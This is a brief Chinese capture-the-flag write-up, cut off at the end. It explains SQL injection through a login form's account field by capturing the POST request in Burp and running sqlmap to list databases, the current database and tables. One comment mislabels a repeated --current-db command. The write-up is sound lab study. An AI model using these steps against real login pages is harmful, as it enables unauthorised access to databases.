此题和最开始拿到sql注入不一样,注入点不再是公告了,二是登陆页面的账号栏,简单的语句就能得到错误回显
根据题目提示,post请求
1)随便输入用户名和密码,然后使用 burp抓取登录界面的post包,保存为txt;
2)将txt放在sqlmap目录下;
3)打开sqlmap,使用post注入;
sqlmap.py -r 文件路径/文件名 --dbs //证明可以注入,且获取所有数据库名
eg:sqlmap.py -r C:\Users\BayernChenTutu\Desktop\2.txt --dbs
sqlmap.py -r 文件路径/文件名 --current-db //获取当前使用 的数据库
eg:sqlmap.py -r C:\Users\BayernChenTutu\Desktop\2.txt --current-db
sqlmap.py -r 文件路径/文件名 --current-db //获取当前使用 的数据库//获取当前数据库中 的所有表名
eg:sqlmap.py -r C:\Users\BayernChenTutu\Desktop\2.txt -